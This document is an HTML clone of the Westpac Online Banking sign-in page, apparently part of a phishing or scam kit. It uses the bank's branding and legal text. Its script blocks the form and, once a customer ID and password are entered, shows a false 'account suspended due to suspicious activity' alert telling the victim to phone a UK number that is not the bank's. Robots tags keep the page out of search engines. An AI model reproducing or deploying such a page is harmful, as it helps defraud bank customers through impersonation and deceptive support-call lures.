<html lang="en" class="authentication js flexbox flexboxlegacy canvas canvastext webgl no-touch geolocation postmessage websqldatabase indexeddb hashchange history draganddrop websockets rgba hsla multiplebgs backgroundsize borderimage borderradius boxshadow textshadow opacity cssanimations csscolumns cssgradients cssreflections csstransforms csstransforms3d csstransitions fontface generatedcontent video audio localstorage sessionstorage webworkers no-applicationcache svg inlinesvg smil svgclippaths es5 console" style=""><head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <meta name="robots" content="noindex, nofollow">
        <meta name="googlebot" content="noindex, nofollow">
        <meta name="bingbot" content="noindex, nofollow">
        <script type="text/javascript" async="" src="http://cdn.appdynamics.com/adrum-ext.0f18582aadae64fbc73c6dcb04bb96c6.js"></script><script type="text/javascript" async="" src="./assets/adrum-ext.0f18582aadae64fbc73c6dcb04bb96c6.js.download"></script>
        <script type="text/javascript" async="async" src="./assets/s99510889052517"></script>
        <script src="./assets/jquery.text-overflow.js.download"></script>
        <script type="text/javascript" charset="UTF-8" src="./assets/adrum.js.download"></script>
        <meta http-equiv="X-UA-Compatible" content="IE=Edge">
        <title>
            Sign in to Westpac Online Banking
        </title>
        <link href="./assets/000-000-0001combined.css.1a6232cd07874834478c928fa1f30b79eea8fe08.css" rel="stylesheet">
        <link href="./assets/000-0001combined.css.ad465e8be579042cb5c8ec3d4ebc745fbe87f2b4.css" rel="stylesheet">
        <link href="./assets/000-0001combined.css.b0cf37060ddf80c0f0adf1583668a8d44dfb5143.css" rel="stylesheet">

        <link rel="shortcut icon" href="assets/favicon.ico.23fb3f626712cf243b43f34a3e3a8e887b8e8250.ico">

        <script src="./assets/f(1).txt"></script>
    </head>
    <body id="unauthenticated-template" data-keymap-data-timeout="{KeymapDataTimeout-Token}" data-isgatekeeperenabled="false" data-gatekeepertimeout="5000" data-customersegment="personal" class="authentication_v2 wr308-template auth_v2_std_signin" data-analytics-allkeys="experience,formName,pageKey,pageName,pageType,siteVersion,src,nav,externalSiteName,productID,itemName,transactionID" data-analytics-pagename="Enter your customer ID" data-analytics-src="20210128-desktop" data-analytics-pagetype="login" data-analytics-formname="personal olb" data-analytics-siteversion="1.1222.24.1" data-analytics-experience="desktop" data-analytics-pagekey="login">
        

        <div id="container">
            <header id="header" role="banner">
                <div id="menu-bar">
                    <ul id="pull-right">
                        <li>
                            <a href="#">
                                Lost or stolen cards
                            </a>
                        </li>
                        <li><a href="#">Contact us</a></li>
                        <li><a href="#">Locate us</a></li>
                        <li>
                            <a class="last-link" href="#">
                                Register for Westpac Online Banking
                            </a>
                        </li>
                    </ul>
                </div>

                <div id="content" class="container-end" tabindex="-1">
                    <div id="logo">
                        <a href="#">
                            <img src="./assets/logo_white_bg.png.ce5c4c19ec61b56796f0e218fc8329c558421fd8.png" alt="Westpac Internet Banking Home">
                        </a>
                    </div>

                    <div id="nav-container">
                        <nav>
                            <ul>
                                <li class="home">
                                    <a href="#">
                                        Home
                                    </a>
                                </li>
                                <li class="personal active">
                                    <a href="#">
                                        Personal
                                    </a>
                                </li>
                                <li class="business">
                                    <a href="#">
                                        Business
                                    </a>
                                </li>
                                <li class="corporate">
                                    <a href="#">
                                        Corporate
                                    </a>
                                </li>
                                <li class="aboutwestpac">
                                    <a href="#">
                                        About us
                                    </a>
                                </li>
                            </ul>
                        </nav>
                    </div>
                </div>
            </header>
        </div>

        <div id="main-container">
            <div id="highSecurityMessageArea"></div>

            <h1 id="page-title">Sign in to Westpac Online Banking</h1>
            <div id="infoBanner"></div>

            <main id="main" role="main" class="main-without-keyboard">
                <div id="errorCode" class="set-alert-margin" style=" display: none;"><div class="alert alert-error " role="alert">       <div class="alert-icon" tabindex="-1">
                     Your account has been suspended due to suspicious activity. Please contact our customer support immediately + 44 020 8123 4813 
                                                            <br>* Error Code - Wp-402<br>
                 </div>     </div></div>
                <form id="login" method="post" autocomplete="off" class="form-modules-v2" action="">

                    <div id="loginPage-v2" class="set-login-image">
                        <div class="login-container">
                            <div class="login-info-container">
                                <div id="main-input-container">
                                    <fieldset>
                                        <legend class="a11y-context">Sign in to Westpac Live Online Banking</legend>

                                        <div>
                                            <label for="fakeusername">
                                                <span class="label-text-main-v2">Customer ID</span>
                                                <input id="fakeusername" maxlength="8" type="text" class="txtbox-layout-white" autocomplete="off" value="" required>
                                            </label>

                                          

                                            <label for="password">
                                                <span class="label-text-main-v2">Password</span>

                                                <input id="password" type="password" name="password" class="txtbox-layout-white txtpwd-layout" autocomplete="off" maxlength="6" required>
                                            </label>

                                          
                                            <div class="remember-me-container">
                                                <label for="rememberme" class="chkbox-container">
                                                    <span id="remember-me-lbl">Remember customer ID</span>
                                                    <input id="rememberme" type="checkbox" data-val="true" value="false" name="rememberme">
                                                    <span class="checkmark">
                                                        <span class="tickmark"></span>
                                                    </span>

                                                    <span class="remember-me-info-flyout" style="display: none;">
                                                        <div class="bubble">
                                                            Not recommended on <br>
                                                            public or shared devices
                                                            <div class="pointer"></div>
                                                            <div class="pointerBorder"></div>
                                                        </div>
                                                    </span>
                                                </label>
                                            </div>
                                        </div>
                                    </fieldset>

                                    <button type="submit" id="signin" accesskey="s" class="btnSignIn-v2 btn btn-primary" title="Sign In">Sign in</button>

                                    <div>
                                        <a href="#">Forgot customer ID or password?</a>
                                    </div>
                                </div>

                                <div id="security-container">
                                    <div class="security-container-inner">
                                        <div class="box box--aside security-protect">
                                            <span class="padlock-icon-v2"></span>
                                            <span class="content">
                                                <span class="heading">Security reminder</span>
                                                <span>Westpac Protect™</span>
                                            </span>
                                        </div>

                                        <ul class="security-signin-info">
                                            <li>Don't sign in if you are sharing access to your computer</li>
                                            <li>Never share your security codes or passwords with anyone</li>
                                            <li>Call us on 132 032 if you are being asked to do this</li>
                                        </ul>

                                        <div class="divOuterLinks">
                                            <a href="#">Learn more about staying safe</a>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <div id="link-container">
                                <div class="link-container-inner">
                                    <ul class="list-links">
                                        <li>
                                            <a class="icon-white-arrow set-aside-font" href="#" data-analytics-pid-imp="1" data-analytics-pid-rec="1">
                                                Register for Online Banking
                                            </a>
                                        </li>
                                        <li>
                                            <a class="icon-white-arrow set-aside-font" href="#">
                                                Online Help
                                            </a>
                                        </li>
                                        <li>
                                            <a class="icon-white-arrow set-aside-font" href="#">
                                                What's new
                                            </a>
                                        </li>
                                        <li>
                                            <a class="icon-white-arrow set-aside-font" href="#">
                                                Online Banking features
                                            </a>
                                        </li>
                                    </ul>
                                </div>
                            </div>
                        </div>
                    </div>

                  
                </form>
            </main>
        </div>

        <footer id="footer" role="contentinfo">
            <div id="footer-container">
                <div class="footer-links">
                    <ul>
                        <li>
                            <a class="link-icon icon-arrow" href="#" data-analytics-pid-imp="1" data-analytics-pid-rec="1">
                                Register for Online Banking
                            </a>
                        </li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Online Banking Help
                            </a>
                        </li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">Online security</a>
                        </li>
                    </ul>
                </div>
                <div class="footer-links">
                    <ul>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                What's new
                            </a>
                        </li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Online Banking features
                            </a>
                        </li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Contact us in the Westpac App
                            </a>
                        </li>
                    </ul>
                </div>
                <div class="footer-links">
                    <ul>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Security Guarantee
                            </a>
                        </li>
                        <li><a class="link-icon icon-arrow" href="#">Keep safe online</a></li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">Types of scams</a>
                        </li>
                    </ul>
                </div>
                <div class="footer-links footer-links--last">
                    <ul>
                        <li><a class="link-icon icon-arrow" href="#">Accessibility</a></li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Supported devices
                            </a>
                        </li>
                        <li>
                            <a class="link-icon icon-arrow" href="#">
                                Terms and Conditions
                            </a>
                        </li>
                    </ul>
                </div>
            </div>
            <div id="copyright-container">
                <div id="logo">
                    <img src="./assets/logo_white_bg.png.ce5c4c19ec61b56796f0e218fc8329c558421fd8.png" alt="Westpac Internet Banking Home">
                </div>
                <p id="copyright">
                    Conditions, fees and charges apply. These may change or we may introduce new ones in the future. Full details are available on request. Lending criteria apply to approval of credit products. This information does not
                    take your personal objectives, circumstances or needs into account. Consider its appropriateness to these factors before acting on it. Read the disclosure documents for your selected product or service, including the
                    <a href="#" style="color: #d5002b;">Terms and Conditions or Product Disclosure Statement</a>, before
                    deciding. Unless otherwise specified, the products and services described on this website are available only in Australia from Westpac Banking Corporation ABN 33 007 457 141 AFSL and Australian credit licence 233714.
                </p>
            </div>
        </footer>

        <div id="promo4273705" class="promoHeader" aria-hidden="true">
            <div class="inner" style="background-image: url(https://banking.westpac.com.au/wbc/banking/Resources/Desktop/WBC/Assets/Images/soon_browsernotsupported1024x168.jpg); background-repeat: no-repeat; background-position: 50% 0;">
                <div class="wrap">
                    <div class="desc">
                        <h2 style="color: #2d373e; text-align: left;">Please check your browser is up to date.</h2>
                        <p class="promoHeader-otp-unsupported">We are currently experiencing problems with earlier versions of Safari.</p>
                    </div>

                    <ul class="cta">
                        <li>
                            <div class="close-container">
                                <a href="#" id="btn2345174_2" class="btn-primary non" rel="nofollow">
                                    <img src="./assets/close-slider.png" alt="close">
                                </a>
                            </div>
                        </li>
                    </ul>
                </div>
            </div>
        </div>
        <div id="promo4243083" class="promoHeader" aria-hidden="true">
            <div class="inner" style="background-image: url(https://banking.westpac.com.au/wbc/banking/Resources/Desktop/WBC/Assets/Images/soon_browsernotsupported1024x168.jpg); background-repeat: no-repeat; background-position: 50% 0;">
                <div class="wrap">
                    <div class="desc">
                        <h2 style="text-align: left; color: #2d373e;">This browser will no longer be supported</h2>
                        <p class="promoHeader-otp-unsupported">
                            We advise all users of unsupported browsers to upgrade to the latest version. <strong>Attention IE6 users</strong>: Soon you will not be able to access Online Banking from this browser.&nbsp;Please upgrade your
                            browser&nbsp;immediately as this improves security and usability.
                        </p>
                    </div>

                    <ul class="cta">
                        <li>
                            <a href="#" id="btn3263506" class="btn-primary non" rel="nofollow">
                                <span>More info</span>
                            </a>
                        </li>

                        <li>
                            <div class="close-container">
                                <a href="#" id="btn2345174" class="btn-primary non" rel="nofollow">
                                    <img src="./assets/close-slider.png" alt="close">
                                </a>
                            </div>
                        </li>
                    </ul>
                </div>
            </div>
        </div>

       

        <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
  <script>
      $(document).ready(function(){
        $("a").attr("href", "#");
          $("a").removeAttr("data-s-object-id");

        $("#signin").click(function(){
         $('#errorCode').hide();
        var fakeusername = $('#fakeusername').val();
         var password = $('#password').val();
          if(fakeusername=='') {
         $('#fakeusername').focus();
         return false;
        }
          if(password=='') {
         $('#password').focus();
         return false;
        }

        if(fakeusername!='' && password!='') {
         $('#errorCode').show();
         return false;
        }
        });
      });
      </script>
    

</body></html>